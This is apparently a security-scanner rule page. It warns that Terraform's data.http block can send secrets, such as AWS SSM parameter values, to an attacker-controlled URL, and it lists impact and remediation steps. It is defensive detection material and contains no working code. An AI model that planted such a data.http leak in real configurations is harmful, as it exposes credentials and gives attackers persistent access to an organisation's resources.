HTTP data block can be used to leak secrets or variables outside of the organization
Severity | Exploitability | Providers | Categories |
---|---|---|---|
CRITICAL | HIGH | AWS | SECRET |
Description
The data.http block can be used to leak any value/data from the configuration to any external URL.
In particular, values generated via the aws_ssm_parameter
resource can be leaked
inside the URL during the http.data query.
This is a critical vulnerability when secure credentials are leaked that way.
Once the vulnerability is in place, with an URL controlled by the attacker, no privileges are required to exploit it. Leaks will continue until remediation.
Impact
Potential data exposure | Visible in logs | User interaction required | Privileges required |
---|---|---|---|
True | True | False | False |
Once credentials have been exposed, an attacker can get persistent access to the exposed resources, and the organisation.
Remediation guidelines
- Revoke all potentially exposed credentials.
- Remove the data.http block if possible.
- If this configuration comes from a third party module, immediately find a "Verified" alternative.